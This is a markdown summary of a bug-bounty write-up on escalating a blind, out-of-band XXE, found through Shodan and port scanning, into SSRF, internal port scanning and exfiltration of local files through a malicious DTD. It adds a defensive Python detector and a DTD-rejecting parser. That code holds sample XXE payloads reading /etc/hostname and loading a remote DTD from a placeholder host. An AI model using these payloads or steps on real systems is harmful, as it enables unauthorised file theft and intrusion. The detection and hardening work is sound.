20230315 - Exploiting Out-of-Band XXE in the Wild from P4 to P1.md
# Exploiting Out-of-Band XXE in the Wild from P4 to P1
## Phase 1 --> Recon
- Collected a list of IPs from Shodan
- Ran a full port scan with rustscan
- Came across an IP whose service on port 9180 used some XML content
- I decided to test for XXE
## Phase 2 --> Analysis
- I tried to retrieve local files, but got nothing
- I used XXE payloads and compared the differences in the responses, but again got nothing.
## Phase 3 --> SSRF (P4)
- I tried to make the server perform an HTTP request to my Burp Collaborator.
- I tried several payloads until finally one of them worked.
- Bingoooooo! Now I have a P4 submission.
## Phase 4 --> Port Scan (P3)
- I thought: what about escalating it to P3 with a simple port scan?
- So I sent a simple request to port 9180 and another to port 1234 and compared the two responses
- Then I made a simple port scan of the top 10000 ports, and I got some open ports :)
## Phase 5 --> Limited OOB XXE (P2)
- I thought it's time to test out-of-band XXE (picture)
- For that we need a malicious DTD file that requests local files
- Our malicious DTD requests the /etc/hostname file and sends it to my IP on port 1337
- And guess what? I got the result.
## Phase 6 --> Final XXE (P1)
- I made the OOB XXE exploitation work successfully!! But actually, I couldn't get any file with multiple lines
- I tried several techniques such as base64, FTP, ... but failed in all of them.
- Finally I was able to do this with error messages
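The phases above all hinge on the XML endpoint accepting a DOCTYPE and resolving entities: the blind probes in Phase 2, the SSRF and port-scan variants in Phases 3 and 4, and the external-DTD / parameter-entity variant in Phases 5 and 6. The following is an added example, not code from the write-up or its author, showing the defender's side in plain Python: a triage function that flags those indicators in a request body, beside an expat-based parser that refuses any document carrying a DTD. The sample bodies are constructed, and the `.invalid` hostnames are placeholders.

```python
import re
import xml.parsers.expat

# Indicators of the XXE variants discussed in the write-up. Matching is on the
# raw body, so it works for triage of logged requests as well as live ones.
_SIGNATURES = {
    # any inline DTD at all; ordinary API clients never send one
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    # entity pointing at a file:// or http:// resource (file read / SSRF / port scan)
    "external_entity": re.compile(rb"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.I),
    # parameter entity, the building block of the out-of-band external-DTD variant
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    # DOCTYPE that loads a remote DTD directly
    "external_dtd": re.compile(rb"<!DOCTYPE\s+[^\s\[>]+\s+(SYSTEM|PUBLIC)\b", re.I),
}


def classify_xml_body(body: bytes) -> set:
    """Return the set of XXE indicator names present in an XML request body."""
    return {name for name, rx in _SIGNATURES.items() if rx.search(body)}


class DoctypeRejected(ValueError):
    """Raised when a document carries a DTD or entity declaration."""


def parse_without_dtd(body: bytes) -> dict:
    """Parse XML with expat, aborting as soon as a DOCTYPE or entity declaration
    is seen. Returns a flat {tag: text} map of the leaf elements."""
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    result = {}
    text_parts = []

    def reject(*_args):
        # Fired for <!DOCTYPE ...> and <!ENTITY ...>; the exception propagates
        # out of parser.Parse(), so nothing after the declaration is processed.
        raise DoctypeRejected("DTD / entity declarations are not accepted")

    def start(_name, _attrs):
        text_parts.clear()

    def chars(data):
        text_parts.append(data)

    def end(name):
        text = "".join(text_parts).strip()
        if text:
            result[name] = text
        text_parts.clear()

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(body, True)
    return result


def is_rejected(body: bytes) -> bool:
    """True if the hardened parser refuses the body."""
    try:
        parse_without_dtd(body)
    except DoctypeRejected:
        return True
    return False


# Constructed sample bodies (not captured traffic). Hostnames are placeholders.
SAMPLES = {
    "benign": b"<?xml version='1.0'?><order><id>42</id><item>widget</item></order>",
    "file_entity": (b"<?xml version='1.0'?><!DOCTYPE d [<!ENTITY xxe SYSTEM "
                    b"\"file:///etc/hostname\">]><order><id>&xxe;</id></order>"),
    "oob_parameter_entity": (b"<?xml version='1.0'?><!DOCTYPE d [<!ENTITY % dtd SYSTEM "
                             b"\"http://dtd-host.invalid/evil.dtd\"> %dtd;]><order/>"),
    "remote_dtd": (b"<?xml version='1.0'?><!DOCTYPE order SYSTEM "
                   b"\"http://dtd-host.invalid/order.dtd\"><order><id>7</id></order>"),
}


def triage_samples() -> dict:
    """Indicators found and hardened-parser verdict for each constructed sample."""
    return {name: (sorted(classify_xml_body(body)), is_rejected(body))
            for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, (indicators, rejected) in triage_samples().items():
        print(f"{name:22} indicators={indicators} rejected={rejected}")
```

The two halves are deliberately independent: the signature set is what you would put in a WAF rule or a log query to spot the probing phases, while refusing the DOCTYPE entirely at parse time is what removes the vulnerability class, including the error-based variant of Phase 6, regardless of how the payload is encoded.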
## Credit
Based on Mahmoud Youssef's writeup.
## Support
You can follow me on Twitter or